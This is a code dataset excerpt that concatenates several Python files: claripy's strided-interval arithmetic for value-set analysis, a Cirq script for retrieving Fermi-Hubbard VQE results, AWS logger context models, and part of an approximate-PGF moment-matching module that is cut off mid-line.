-m\n if tmp <= d:\n ret = tmp | a\n break\n m = m >> 1\n\n return ret\n\n @staticmethod\n def max_or(k, a, b, c, d):\n m = StridedInterval.highbit(k)\n while True:\n if m == 0:\n return b | d\n elif (b & d & m) != 0:\n tmp1 = (b - m) | (m - 1)\n tmp2 = (d - m) | (m - 1)\n if tmp1 >= a:\n return tmp1 | d\n elif tmp2 >= c:\n return tmp2 | b\n m = m >> 1\n\n @normalize_types\n def bitwise_or(self, b):\n \"\"\"\n Binary operation: logical or\n :param b: The other operand\n :return: self | b\n \"\"\"\n\n splitted_a = self._ssplit()\n splitted_b = b._ssplit()\n\n ret = StridedInterval.empty(self.bits)\n for x in splitted_a:\n for y in splitted_b:\n tmp = self._wrapped_bitwise_or(x, y)\n ret = ret.union(tmp)\n\n return ret.normalize()\n\n @normalize_types\n def bitwise_and(self, b):\n \"\"\"\n Binary operation: logical and\n :param b: The other operand\n :return:\n \"\"\"\n\n splitted_a = self._ssplit()\n splitted_b = b._ssplit()\n\n ret = StridedInterval.empty(self.bits)\n for x in splitted_a:\n for y in splitted_b:\n tmp = self._wrapped_bitwise_and(x, y)\n ret = ret.union(tmp)\n\n return ret.normalize()\n\n @normalize_types\n def bitwise_xor(self, b):\n '''\n Operation xor\n :param b: The other operand\n :return:\n '''\n return self.bitwise_not().bitwise_or(b).bitwise_not().bitwise_or(b.bitwise_not().bitwise_or(self).bitwise_not())\n\n def _pre_shift(self, shift_amount):\n def get_range(expr):\n '''\n Get the range of bits for shifting\n :param expr:\n :return: A tuple of maximum and minimum bits to shift\n '''\n def round(max, x): #pylint:disable=redefined-builtin\n if x < 0 or x > max:\n return max\n else:\n return x\n\n if type(expr) in [int, long]:\n return (expr, expr)\n\n assert type(expr) is StridedInterval\n\n if expr.is_integer:\n return (round(self.bits, expr.lower_bound),\n round(self.bits, expr.lower_bound))\n else:\n if expr.lower_bound < 0:\n if expr.upper_bound >= 0:\n return (0, self.bits)\n else:\n return (self.bits, self.bits)\n else:\n return (round(self.bits, self.lower_bound), round(self.bits, self.upper_bound))\n\n lower, upper = get_range(shift_amount)\n # TODO: Is trancating necessary?\n\n return lower, upper\n\n @reversed_processor\n def rshift(self, shift_amount):\n lower, upper = self._pre_shift(shift_amount)\n\n # Shift the lower_bound and upper_bound by all possible amounts, and\n # get min/max values from all the resulting values\n\n new_lower_bound = None\n new_upper_bound = None\n for shift_amount in xrange(lower, upper + 1):\n l = self.lower_bound >> shift_amount\n if new_lower_bound is None or l < new_lower_bound:\n new_lower_bound = l\n u = self.upper_bound >> shift_amount\n if new_upper_bound is None or u > new_upper_bound:\n new_upper_bound = u\n\n # NOTE: If this is an arithmetic operation, we should take care\n # of sign-changes.\n\n ret = StridedInterval(bits=self.bits,\n stride=max(self.stride >> upper, 1),\n lower_bound=new_lower_bound,\n upper_bound=new_upper_bound)\n ret.normalize()\n\n return ret\n\n @reversed_processor\n def lshift(self, shift_amount):\n lower, upper = self._pre_shift(shift_amount)\n\n # Shift the lower_bound and upper_bound by all possible amounts, and\n # get min/max values from all the resulting values\n\n new_lower_bound = None\n new_upper_bound = None\n for shift_amount in xrange(lower, upper + 1):\n l = self.lower_bound << shift_amount\n if new_lower_bound is None or l < new_lower_bound:\n new_lower_bound = l\n u = self.upper_bound << shift_amount\n if new_upper_bound is None or u > new_upper_bound:\n new_upper_bound = u\n\n # NOTE: If this is an arithmetic operation, we should take care\n # of sign-changes.\n\n ret = StridedInterval(bits=self.bits,\n stride=max(self.stride << lower, 1),\n lower_bound=new_lower_bound,\n upper_bound=new_upper_bound)\n ret.normalize()\n\n return ret\n\n @reversed_processor\n def cast_low(self, tok):\n assert tok <= self.bits\n\n if tok == self.bits:\n return self.copy()\n else:\n # Calcualte the new upper bound and lower bound\n mask = (1 << tok) - 1\n if (self.lower_bound & mask) == self.lower_bound and \\\n (self.upper_bound & mask) == self.upper_bound:\n return StridedInterval(bits=tok, stride=self.stride,\n lower_bound=self.lower_bound,\n upper_bound=self.upper_bound)\n\n elif self.upper_bound - self.lower_bound <= mask:\n l = self.lower_bound & mask\n u = self.upper_bound & mask\n # Keep the signs!\n if self.lower_bound < 0:\n l = StridedInterval._to_negative(l, tok)\n if self.upper_bound < 0:\n u = StridedInterval._to_negative(u, tok)\n return StridedInterval(bits=tok, stride=self.stride,\n lower_bound=l,\n upper_bound=u)\n\n elif (self.upper_bound & mask == self.lower_bound & mask) and \\\n ((self.upper_bound - self.lower_bound) & mask == 0):\n # This operation doesn't affect the stride. Stride should be 0 then.\n\n bound = self.lower_bound & mask\n\n return StridedInterval(bits=tok,\n stride=0,\n lower_bound=bound,\n upper_bound=bound)\n\n else:\n # TODO: How can we do better here? For example, keep the stride information?\n return self.top(tok)\n\n @normalize_types\n def concat(self, b):\n\n # Zero-extend\n a = self.nameless_copy()\n a._bits += b.bits\n\n new_si = a.lshift(b.bits)\n new_b = b.copy()\n # Zero-extend b\n new_b._bits = new_si.bits\n\n if new_si.is_integer:\n # We can be more precise!\n new_si._bits = new_b.bits\n new_si._stride = new_b.stride\n new_si._lower_bound = new_si.lower_bound + b.lower_bound\n new_si._upper_bound = new_si.upper_bound + b.upper_bound\n return new_si\n else:\n return new_si.bitwise_or(new_b)\n\n @reversed_processor\n def extract(self, high_bit, low_bit):\n\n assert low_bit >= 0\n\n bits = high_bit - low_bit + 1\n\n if low_bit != 0:\n ret = self.rshift(low_bit)\n else:\n ret = self.copy()\n if bits != self.bits:\n ret = ret.cast_low(bits)\n\n return ret.normalize()\n\n @reversed_processor\n def sign_extend(self, new_length):\n \"\"\"\n Unary operation: SignExtend\n\n :param new_length: New length after sign-extension\n :return: A new StridedInterval\n \"\"\"\n\n msb = self.extract(self.bits - 1, self.bits - 1).eval(2)\n\n if msb == [ 0 ]:\n # All positive numbers\n return self.zero_extend(new_length)\n\n if msb == [ 1 ]:\n # All negative numbers\n\n si = self.copy()\n si._bits = new_length\n\n mask = (2 ** new_length - 1) - (2 ** self.bits - 1)\n si._lower_bound = si._lower_bound | mask\n si._upper_bound = si._upper_bound | mask\n\n else:\n # Both positive numbers and negative numbers\n numbers = self._nsplit()\n\n # Since there are both positive and negative numbers, there must be two bounds after nsplit\n # assert len(numbers) == 2\n\n si = self.empty(new_length)\n\n for n in numbers:\n a, b = n.lower_bound, n.upper_bound\n\n if b < 2 ** (n.bits - 1):\n # msb = 0\n\n si_ = StridedInterval(bits=new_length, stride=n.stride, lower_bound=a, upper_bound=b)\n\n else:\n # msb = 1\n\n mask = (2 ** new_length - 1) - (2 ** self.bits - 1)\n\n si_ = StridedInterval(bits=new_length, stride=n.stride, lower_bound=a | mask, upper_bound=b | mask)\n\n si = si.union(si_)\n\n return si\n\n @reversed_processor\n def zero_extend(self, new_length):\n \"\"\"\n Unary operation: ZeroExtend\n\n :param new_length: New length after zero-extension\n :return: A new StridedInterval\n \"\"\"\n\n si = self.copy()\n si._bits = new_length\n\n return si\n\n @normalize_types\n def union(self, b):\n \"\"\"\n The union operation. It might return a DiscreteStridedIntervalSet to allow for better precision in analysis.\n\n :param b: Operand\n :return: A new DiscreteStridedIntervalSet, or a new StridedInterval.\n \"\"\"\n if not allow_dsis:\n return self._union(b)\n\n else:\n if self.cardinality > discrete_strided_interval_set.MAX_CARDINALITY_WITHOUT_COLLAPSING or \\\n b.cardinality > discrete_strided_interval_set:\n return self._union(b)\n\n else:\n dsis = DiscreteStridedIntervalSet(bits=self._bits, si_set={ self })\n return dsis.union(b)\n\n @normalize_types\n def _union(self, b):\n \"\"\"\n Binary operation: union\n It's also the join operation.\n\n :param b: The other operand.\n :return: A new StridedInterval\n \"\"\"\n if self._reversed != b._reversed:\n logger.warning('Incoherent reversed flag between operands %s and %s', self, b)\n\n #\n # Trivial cases\n #\n\n if self.is_empty:\n return b\n if b.is_empty:\n return self\n\n if self.is_integer and b.is_integer:\n u = max(self.upper_bound, b.upper_bound)\n l = min(self.lower_bound, b.lower_bound)\n stride = abs(u - l)\n return StridedInterval(bits=self.bits, stride=stride, lower_bound=l, upper_bound=u)\n\n #\n # Other cases\n #\n\n # Determine the new stride\n if self.is_integer:\n new_stride = fractions.gcd(self._modular_sub(self.lower_bound, b.lower_bound, self.bits), b.stride)\n elif b.is_integer:\n new_stride = fractions.gcd(self.stride, self._modular_sub(b.lower_bound, self.lower_bound, self.bits))\n else:\n new_stride = fractions.gcd(self.stride, b.stride)\n\n remainder_1 = self.lower_bound % new_stride if new_stride > 0 else 0\n remainder_2 = b.lower_bound % new_stride if new_stride > 0 else 0\n if remainder_1 != remainder_2:\n new_stride = fractions.gcd(abs(remainder_1 - remainder_2), new_stride)\n\n # Then we have different cases\n\n if self._wrapped_lte(b):\n # Containment\n\n return StridedInterval(bits=self.bits, stride=new_stride, lower_bound=b.lower_bound,\n upper_bound=b.upper_bound)\n\n elif b._wrapped_lte(self):\n # Containment\n\n # TODO: This case is missing in the original implementation. Is that a bug?\n return StridedInterval(bits=self.bits, stride=new_stride, lower_bound=self.lower_bound,\n upper_bound=self.upper_bound)\n\n elif (self._wrapped_member(b.lower_bound) and self._wrapped_member(b.upper_bound) and\n b._wrapped_member(self.lower_bound) and b._wrapped_member(self.upper_bound)):\n # The union of them covers the entire sphere\n\n return StridedInterval.top(self.bits)\n\n elif self._wrapped_member(b.lower_bound):\n # Overlapping\n\n return StridedInterval(bits=self.bits, stride=new_stride, lower_bound=self.lower_bound,\n upper_bound=b.upper_bound)\n\n elif b._wrapped_member(self.lower_bound):\n # Overlapping\n\n return StridedInterval(bits=self.bits, stride=new_stride, lower_bound=b.lower_bound,\n upper_bound=self.upper_bound)\n\n else:\n card_1 = self._wrapped_cardinality(self.upper_bound, b.lower_bound, self.bits)\n card_2 = self._wrapped_cardinality(b.upper_bound, self.lower_bound, self.bits)\n\n if card_1 == card_2:\n # Left/right leaning cases\n if self._lex_lt(self.lower_bound, b.lower_bound, self.bits):\n return StridedInterval(bits=self.bits, stride=new_stride, lower_bound=self.lower_bound,\n upper_bound=b.upper_bound)\n\n else:\n return StridedInterval(bits=self.bits, stride=new_stride, lower_bound=b.lower_bound,\n upper_bound=self.upper_bound)\n\n elif card_1 < card_2:\n # non-overlapping case (left)\n return StridedInterval(bits=self.bits, stride=new_stride, lower_bound=self.lower_bound,\n upper_bound=b.upper_bound)\n\n else:\n # non-overlapping case (right)\n return StridedInterval(bits=self.bits, stride=new_stride, lower_bound=b.lower_bound,\n upper_bound=self.upper_bound)\n\n def _minimum_intersection_integer(self, other, lb_from_self):\n \"\"\"\n Solves for the minimum integer that exists in both StridedIntervals\n\n :param other: The other operand\n :param lb_from_self: True/False. If True, then we have `other` contains `self` or `other` contains\n `self`.lower_bound, and vice versa\n :return: The minimum integer if there is one, or None if it doesn't exist.\n \"\"\"\n\n # TODO: lb_from_self is unused. Further understanding is needed to determine whether it can be removed or not\n\n # It's equivalent to finding a integral solution for equation `ax + b = cy + d` that makes `ax + b` minimal\n # Some assumptions:\n # a, b, c, d are all positive integers\n # x >= 0, y >= 0\n\n if self.lower_bound > self.upper_bound:\n # straddling the south pole\n\n A, B = self._ssplit()\n\n int_0 = A._minimum_intersection_integer(other, lb_from_self)\n int_1 = B._minimum_intersection_integer(other, lb_from_self)\n\n # Note that int_1 has priority if both of them are not None, since int_1 is from the right side of the\n # number ring, and is thereby less than int_0\n return int_1 if int_0 is None else int_0\n\n else:\n if other.lower_bound > other.upper_bound:\n return other._minimum_intersection_integer(self, lb_from_self)\n\n else:\n return self._minimum_intersection_integer_splitted(other)\n\n def _minimum_intersection_integer_splitted(self, other):\n \"\"\"\n Solves for the minimum integer that exists in both StridedIntervals\n\n :param other: The other operand\n :return: The minimum integer if there is one, or None if it doesn't exist.\n \"\"\"\n\n # It's equivalent to finding a integral solution for equation `ax + b = cy + d` that makes `ax + b` minimal\n # Some assumptions:\n # a, b, c, d are all positive integers\n # x >= 0, y >= 0\n\n # if any of them is an integer\n if self.is_integer:\n if other.is_integer:\n return None if self.lower_bound != other.lower_bound else self.lower_bound\n elif self.lower_bound >= other.lower_bound and \\\n self.lower_bound <= other.upper_bound and \\\n (self.lower_bound - other.lower_bound) % other.stride == 0:\n return self.lower_bound\n else:\n return None\n elif other.is_integer:\n return other._minimum_intersection_integer_splitted(self)\n\n # shortcut\n if self.upper_bound < other.lower_bound or other.upper_bound < self.lower_bound:\n # They don't overlap at all\n return None\n\n a, b, c, d = self.stride, self.lower_bound, other.stride, other.lower_bound\n\n if (d - b) % self.gcd(a, c) != 0:\n # They don't overlap\n return None\n\n if a < c:\n mod = (d - b) % a\n min_y_mod = a - mod if mod != 0 else 0\n base_y = int((b - d) / c) if (b - d) % c == 0 else int((b - d) / c) + 1\n base_y = 0 if base_y < 0 else base_y\n min_y = min_y_mod + base_y\n first_integer = c * min_y + d\n else:\n mod = (b - d) % c\n min_x_mod = c - mod if mod != 0 else 0\n base_x = int((d - b) / a) if (d - b) % a == 0 else int((d - b) / a) + 1\n base_x = 0 if base_x < 0 else base_x\n min_x = min_x_mod + base_x\n first_integer = a * min_x + b\n\n if self._wrapped_member(first_integer) and \\\n self._modular_sub(first_integer, self.lower_bound, self.bits) % self.stride == 0 and \\\n other._wrapped_member(first_integer) and \\\n other._modular_sub(first_integer, other.lower_bound, other.bits) % other.stride == 0:\n return first_integer\n else:\n return None\n\n @normalize_types\n def intersection(self, b):\n if self.is_empty or b.is_empty:\n return StridedInterval.empty(self.bits)\n\n assert self.bits == b.bits\n\n if self.is_integer and b.is_integer:\n if self.lower_bound == b.lower_bound:\n # They are the same number!\n ret = StridedInterval(bits=self.bits,\n stride=0,\n lower_bound=self.lower_bound,\n upper_bound=self.lower_bound)\n else:\n ret = StridedInterval.empty(self.bits)\n\n elif self.is_integer:\n integer = self.lower_bound\n if (b.lower_bound - integer) % b.stride == 0 and \\\n b._wrapped_member(integer):\n ret = StridedInterval(bits=self.bits,\n stride=0,\n lower_bound=integer,\n upper_bound=integer)\n else:\n ret = StridedInterval.empty(self.bits)\n\n elif b.is_integer:\n integer = b.lower_bound\n if (integer - self.lower_bound) % self.stride == 0 and \\\n self._wrapped_member(integer):\n ret = StridedInterval(bits=self.bits,\n stride=0,\n lower_bound=integer,\n upper_bound=integer)\n else:\n ret = StridedInterval.empty(self.bits)\n\n else:\n # None of the operands is an integer\n\n new_stride = self.lcm(self.stride, b.stride)\n if self._wrapped_lte(b):\n # `b` may fully contain `self`\n\n lb = self._minimum_intersection_integer(b, True)\n if lb is None:\n ret = StridedInterval.empty(self.bits)\n\n else:\n ub = self._modular_add(\n self._modular_sub(self.upper_bound, lb, self.bits) / new_stride * new_stride,\n lb,\n self.bits\n )\n ret = StridedInterval(bits=self.bits,\n stride=new_stride,\n lower_bound=lb,\n upper_bound=ub\n )\n\n elif b._wrapped_lte(self):\n # `self` contains `b`\n\n lb = b._minimum_intersection_integer(self, True)\n\n if lb is None:\n ret = StridedInterval.empty(self.bits)\n\n else:\n ub = self._modular_add(\n self._modular_sub(b.upper_bound, lb, self.bits) / new_stride * new_stride,\n lb,\n self.bits\n )\n ret = StridedInterval(bits=self.bits,\n stride=new_stride,\n lower_bound=lb,\n upper_bound=ub\n )\n\n elif self._wrapped_member(b.lower_bound) and \\\n self._wrapped_member(b.upper_bound) and \\\n b._wrapped_member(self.lower_bound) and \\\n b._wrapped_member(self.upper_bound):\n # One cover the other\n\n card_1 = self._wrapped_cardinality(self.lower_bound, self.upper_bound, self.bits)\n card_2 = self._wrapped_cardinality(b.lower_bound, b.upper_bound, b.bits)\n if self._lex_lt(card_1, card_2, self.bits) or \\\n (card_1 == card_2 and self._lex_lte(self.lower_bound, b.lower_bound, self.bits)):\n lb = self._minimum_intersection_integer(b, True)\n\n if lb is None:\n ret = StridedInterval.empty(self.bits)\n\n else:\n ub = self._modular_add(\n self._modular_sub(self.upper_bound, lb, self.bits) / new_stride * new_stride,\n lb,\n self.bits\n )\n ret = StridedInterval(bits=self.bits,\n stride=new_stride,\n lower_bound=lb,\n upper_bound=ub\n )\n else:\n lb = self._minimum_intersection_integer(b, False)\n\n if lb is None:\n ret = StridedInterval.empty(self.bits)\n\n else:\n ub = self._modular_add(\n self._modular_sub(b.upper_bound, lb, self.bits) / new_stride * new_stride,\n lb,\n self.bits\n )\n ret = StridedInterval(bits=self.bits,\n stride=new_stride,\n lower_bound=lb,\n upper_bound=ub\n )\n elif self._wrapped_member(b.lower_bound):\n # Overlapping\n\n lb = b._minimum_intersection_integer(self, True)\n\n if lb is None:\n ret = StridedInterval.empty(self.bits)\n\n else:\n ub = self._modular_add(\n self._modular_sub(self.upper_bound, lb, self.bits) / new_stride * new_stride,\n lb,\n self.bits\n )\n ret = StridedInterval(bits=self.bits,\n stride=new_stride,\n lower_bound=lb,\n upper_bound=ub\n )\n\n elif b._wrapped_member(self.lower_bound):\n # Overlapping\n\n lb = self._minimum_intersection_integer(b, True)\n\n if lb is None:\n ret = StridedInterval.empty(self.bits)\n\n else:\n ub = self._modular_add(\n self._modular_sub(b.upper_bound, lb, self.bits) / new_stride * new_stride,\n lb,\n self.bits\n )\n ret = StridedInterval(bits=self.bits,\n stride=new_stride,\n lower_bound=lb,\n upper_bound=ub\n )\n\n else:\n # Disjoint\n ret = StridedInterval.empty(self.bits)\n\n ret.normalize()\n return ret\n\n @normalize_types\n def widen(self, b):\n ret = None\n\n if self.is_empty and not b.is_empty:\n ret = StridedInterval.top(bits=self.bits)\n\n elif self.is_empty:\n ret = b\n\n elif b.is_empty:\n ret = self\n\n else:\n new_stride = fractions.gcd(self.stride, b.stride)\n l = StridedInterval.lower(self.bits, self.lower_bound, new_stride) if b.lower_bound < self.lower_bound else self.lower_bound\n u = StridedInterval.upper(self.bits, self.upper_bound, new_stride) if b.upper_bound > self.upper_bound else self.upper_bound\n if new_stride == 0:\n if self.is_integer and b.is_integer:\n ret = StridedInterval(bits=self.bits, stride=1, lower_bound=l, upper_bound=u)\n else:\n raise ClaripyOperationError('SI: operands are not reduced.')\n else:\n ret = StridedInterval(bits=self.bits, stride=new_stride, lower_bound=l, upper_bound=u)\n\n ret.normalize()\n return ret\n\n def reverse(self):\n \"\"\"\n This is a delayed reversing function. All it really does is to invert the _reversed property of this\n StridedInterval object.\n\n :return: None\n \"\"\"\n if self.bits == 8:\n # We cannot reverse a one-byte value\n return self.copy()\n\n si = self.copy()\n si._reversed = not si._reversed\n\n return si\n\n def _reverse(self):\n \"\"\"\n This method reverses the StridedInterval object for real. Do expect loss of precision for most cases!\n\n :return: A new reversed StridedInterval instance\n \"\"\"\n\n o = self.copy()\n # Clear the reversed flag\n o._reversed = not o._reversed\n\n if o.bits == 8:\n # No need for reversing\n return o.copy()\n\n if o.is_top:\n # A TOP is still a TOP after reversing\n si = o.copy()\n return si\n\n else:\n if not o.is_integer:\n # We really don't want to do that... but well, sometimes it just happens...\n logger.warning('Reversing a real strided-interval %s is bad', self)\n\n # Reversing an integer is easy\n rounded_bits = ((o.bits + 7) / 8) * 8\n list_bytes = [ ]\n si = None\n\n for i in xrange(0, rounded_bits, 8):\n b = o.extract(min(i + 7, o.bits - 1), i)\n list_bytes.append(b)\n\n for b in list_bytes:\n si = b if si is None else si.concat(b)\n\n return si\n\ndef CreateStridedInterval(name=None, bits=0, stride=None, lower_bound=None, upper_bound=None, uninitialized=False, to_conv=None):\n '''\n :param name:\n :param bits:\n :param stride:\n :param lower_bound:\n :param upper_bound:\n :param to_conv:\n :return:\n '''\n if to_conv is not None:\n if isinstance(to_conv, Base):\n to_conv = to_conv.model\n if isinstance(to_conv, StridedInterval):\n # No conversion will be done\n return to_conv\n\n if type(to_conv) not in {int, long, BVV}: #pylint:disable=unidiomatic-typecheck\n raise ClaripyOperationError('Unsupported to_conv type %s' % type(to_conv))\n\n if stride is not None or lower_bound is not None or \\\n upper_bound is not None:\n raise ClaripyOperationError('You cannot specify both to_conv and other parameters at the same time.')\n\n if type(to_conv) is BVV: #pylint:disable=unidiomatic-typecheck\n bits = to_conv.bits\n to_conv_value = to_conv.value\n else:\n bits = bits\n to_conv_value = to_conv\n\n stride = 0\n lower_bound = to_conv_value\n upper_bound = to_conv_value\n\n bi = StridedInterval(name=name,\n bits=bits,\n stride=stride,\n lower_bound=lower_bound,\n upper_bound=upper_bound,\n uninitialized=uninitialized)\n return bi\n\n\nfrom .errors import ClaripyVSAError\nfrom ..errors import ClaripyOperationError\nfrom .bool_result import TrueResult, FalseResult, MaybeResult\nfrom . import discrete_strided_interval_set\nfrom .discrete_strided_interval_set import DiscreteStridedIntervalSet\nfrom .valueset import ValueSet\nfrom ..ast.base import Base\nfrom ..bv import BVV\n","sub_path":"claripy/vsa/strided_interval.py","file_name":"strided_interval.py","file_ext":"py","file_size_in_byte":83086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"27832305","text":"# Copyright 2021 Phasecraft Ltd.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport cirq\n\nimport os\nimport json\nimport logging\nimport numpy as np\nimport pandas as pd\n\nlogger = logging.getLogger(\"fhvqe.retrieve_data\")\n\n# Constants\nCIRCUIT_JSON = \"circuit.json\"\nRESULTS_JSON = \"results.json\"\nPROJECT_ID = \"fermi-hubbard-vqe\"\nRESULTS_FOLDER = \"results\"\n\nproject_id = PROJECT_ID\nengine = cirq.google.Engine(project_id=project_id)\n\n\nprogram_id_filename = \"data/program_ids.csv\"\nfull_program_ids = []\nwith open(program_id_filename, \"r\") as pids:\n full_program_ids = [pid[:-1] for pid in pids]\n\ndef retrieve_historical_data(program_id, prefix=\"\"):\n \"\"\"Retrieve historical data for a given program_id\n\n Args:\n program_id -- The program_id as saved in jobs_xxx.json\n prefix -- The job prefix, e.g. \"tflo-\", \"noise-\", \"givens\" or ...\n\n Returns:\n (jobs, results) A list `jobs` containing all jobs with the \n given program_id and a list containing all the `result`s of \n these jobs.\n \"\"\"\n full_pids = list(filter(lambda pid: prefix+program_id in pid, full_program_ids))\n jobs = []\n print(f\"Program id: {program_id}. Prefix: {prefix}. Full pids: {list(full_pids)}\")\n for full_pid in full_pids:\n jobs += engine.get_program(program_id=full_pid).list_jobs()\n results = [job.results() for job in jobs]\n return jobs, results\n\n\ndef retrieve_historical_samples(program_id, prefix=\"\"):\n \"\"\"Retrieve historical samples for a given program_id\n\n Args:\n program_id -- The program_id as saved in jobs_xxx.json\n prefix -- The job prefix, e.g. \"tflo-\", \"noise-\", \"givens\" or ...\n\n Returns:\n `samples` A list of int16-matrices containing the samples ordered s.t. \n they are compatible with the observables in `scripts/analyse_results.py`\n \"\"\"\n jobs, results = retrieve_historical_data(program_id, prefix=prefix)\n print(f\"Retrieved {len(jobs)} jobs for program id {program_id} prefix {prefix}\")\n samples = results[0]\n samples = [s.measurements[\"x\"].astype(np.int16).T for s in samples]\n return samples\n\n\ndef load_samples_txt(filename):\n \"\"\"Load a samples.txt file to a list of numpy arrays\n\n Args:\n filename -- The `samples.txt` (or similar) filename containing the samples\n\n Returns:\n `samples` A list of int16-matrices containing the samples ordered s.t. \n they are compatible with the observables in `scripts/analyse_results.py`.\n \"\"\"\n with open(filename) as file:\n samples_blocks = file.read().split(\"\\n\\n\\n\")\n # delete last block if it is empty\n if len(samples_blocks[-1]) == 1: samples_blocks = samples_blocks[:-1]\n samples_list = [block.splitlines() for block in samples_blocks]\n samples = []\n for sample in samples_list:\n if len(sample) != 0:\n arr = np.empty((len(sample[0]), len(sample)), dtype=np.int16)\n for i in range(len(sample[0])):\n for j in range(len(sample)):\n arr[i,j] = sample[j][i]\n samples.append(arr)\n \n return samples\n\n# Allow this file to be run directly as a separate script.\nif __name__ == \"__main__\":\n # Change here:\n folder = \"heatmaps/4x1\"\n filename = \"jobs_4x1_2.json\"\n\n full_filename = os.path.join(folder, filename)\n results_folder = os.path.join(folder, RESULTS_FOLDER)\n if not os.path.exists(results_folder):\n os.makedirs(results_folder)\n\n with open(full_filename) as json_file:\n jobs_data = json.load(json_file)\n\n for j, job_data in enumerate(jobs_data):\n print(f\"[{j}/{len(jobs_data)-1}]\\r\", end=\"\")\n job_id = job_data[\"job_id\"]\n prog_id = job_data[\"prog_id\"]\n job = engine.get_program(program_id=prog_id).get_job(job_id=job_id)\n if job.status() == \"SUCCESS\":\n job_results = job.results()\n prog_folder = os.path.join(results_folder, prog_id)\n if not os.path.exists(prog_folder):\n os.makedirs(prog_folder)\n prog_data = cirq.to_json(job.program().get_circuit())\n with open(os.path.join(prog_folder, CIRCUIT_JSON), 'w') as outfile:\n json.dump(prog_data, outfile)\n with open(os.path.join(prog_folder, RESULTS_JSON), 'w') as outfile:\n json.dump(cirq.to_json(job_results), outfile)\n\n","sub_path":"fhvqe/retrieve_data.py","file_name":"retrieve_data.py","file_ext":"py","file_size_in_byte":4858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"136763953","text":"\"\"\"\nModels for the 'Logger' decorator classes\n\n\"\"\"\n__all__ = ['LambdaContext', 'TaskContext', '_BaseContext']\n\nimport os\nfrom dataclasses import dataclass\nfrom typing import Callable, Dict, Optional, Any\n\nimport requests\n\nfrom .log import LOG\n\n\n@dataclass\nclass _BaseContext:\n \"\"\"\n Base Context class, which defines the minimum attributes that a Context\n object would be expected to contain.\n \"\"\"\n function_name: str\n\n\nclass TaskContext(_BaseContext):\n\n def __init__(self, fn: Callable):\n \"\"\"\n Create a :class:`TaskContext` object.\n \"\"\"\n super().__init__(fn.__qualname__)\n\n @classmethod\n def get_ecs_metadata(cls, endpoint_env_var='ECS_CONTAINER_METADATA_URI_V4'\n ) -> Optional[Dict[str, Any]]:\n \"\"\"\n Retrieve metadata for the ECS or Fargate task, if available.\n Uses the Task Metadata V4 endpoint.\n\n Ref: https://docs.aws.amazon.com/AmazonECS/latest/userguide/task-metadata-endpoint-v4-fargate.html\n \"\"\"\n metadata_url = os.getenv(endpoint_env_var)\n\n if not metadata_url:\n docs_link = ('https://docs.aws.amazon.com/AmazonECS/latest/userguide/'\n 'task-metadata-endpoint-v4-fargate.html')\n LOG.info(\n f'Environment variable \"{endpoint_env_var}\" not defined '\n 'in task; consider updating to platform version 1.4.0 to enable '\n 'this feature. Please refer to the following docs:\\n'\n f' {docs_link}')\n return\n\n return cls._retrieve_ecs_metadata(metadata_url)\n\n @staticmethod\n def _retrieve_ecs_metadata(metadata_url: str) -> Dict[str, Any]:\n \"\"\"\n Make a call to the ECS Metadata endpoint and return the result as a\n dictionary object.\n \"\"\"\n r = requests.get(metadata_url)\n r.raise_for_status()\n\n return r.json()\n\n\nclass LambdaContext(_BaseContext):\n\n def __init__(self, function_name: str,\n request_id=None, account_id=None, account_name=None):\n \"\"\"\n Create a :class:`LambdaContext` object.\n \"\"\"\n super().__init__(function_name)\n\n self.request_id = request_id\n self.account_id = account_id\n self.account_name = account_name\n","sub_path":"aws_teams_logger/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"142788311","text":"import numpy as np\nfrom scipy.special import gammaln\nfrom scipy.misc import factorial\nimport gdual as gd\n\nimport forward as fwd\n\n# get parameters of a poisson by matching moments with some dist'n p\ndef MM_Poiss(mean_p):\n lambda_q = mean_p\n theta_q = [lambda_q]\n\n return theta_q\n\n# get parameters of a nb by matching moments with some dist'n p\ndef MM_NB(mean_p, var_p):\n assert var_p > mean_p, 'Error in MM_NB: cannot approximate a distn with mean >= var'\n r_q = (mean_p ** 2) / (var_p - mean_p)\n p_q = 1 - (mean_p / var_p)\n theta_q = [r_q, p_q]\n\n return theta_q\n\n# get parameters of a binomial by matching moments with some dist'n p\ndef MM_Binom(mean_p, var_p):\n assert mean_p > var_p, 'Error in MM_Binom: cannot approximate a distn with mean <= var'\n\n n_q = mean_p / (1 - (var_p / mean_p))\n\n ###\n # note: for a binomial, n_q must be integral. Further examination is needed to determine the best/correct way,\n # but for now, I'm just rounding it to the nearest integer, then setting $p$ correspondingly\n ###\n\n n_q = np.round(n_q)\n p_q = mean_p / n_q\n theta_q = [n_q, p_q]\n\n return theta_q\n\ndef APGF(F_p, Z = None, GDualType = gd.LSGDual, return_type = ['name', 'param', 'lambda']):\n # compute the normalization constant for F if it wasn't provided\n if Z is None:\n Z = F_p(GDualType.const(1)).get(0, as_log=False)\n\n # renormalize the distribution before computing moments (this is now done later)\n # F_star = lambda s: F_p(s) / Z\n\n # construct M_p, the MGF of p, from F_p\n M_p = lambda t: F_p(np.exp(t))\n\n # use the MGF to compute the first k moments of p\n k = 2\n t0_gd = GDualType(0, q=k)\n\n # extract the moments (note the renormalization by logZ)\n # note: this assumes the mean and variance of F_p are >= 0, which they should be for a count distribution\n # but we go ahead and force that for stability reasons\n moments_p = M_p(t0_gd)\n # log_moments_p.trunc_neg_coefs()\n moments_p = np.exp(moments_p.get(range(1,k+1), as_log=True) + gammaln(np.arange(2, k + 2)) - np.log(Z))\n\n mean_p = moments_p[0]\n var_p = moments_p[1] - (mean_p ** 2)\n\n # mean_p = np.exp(log_mean_p)\n # var_p = np.exp(log_var_p)\n\n assert np.isfinite(mean_p) and np.isfinite(var_p)\n\n # assert not np.isposinf(log_mean_p) and not np.isnan(log_mean_p)\n # assert not np.isposinf(log_var_p) and not np.isnan(log_var_p)\n\n # if mean and var are \"close\" (to numerical stability) treat them as equal\n if 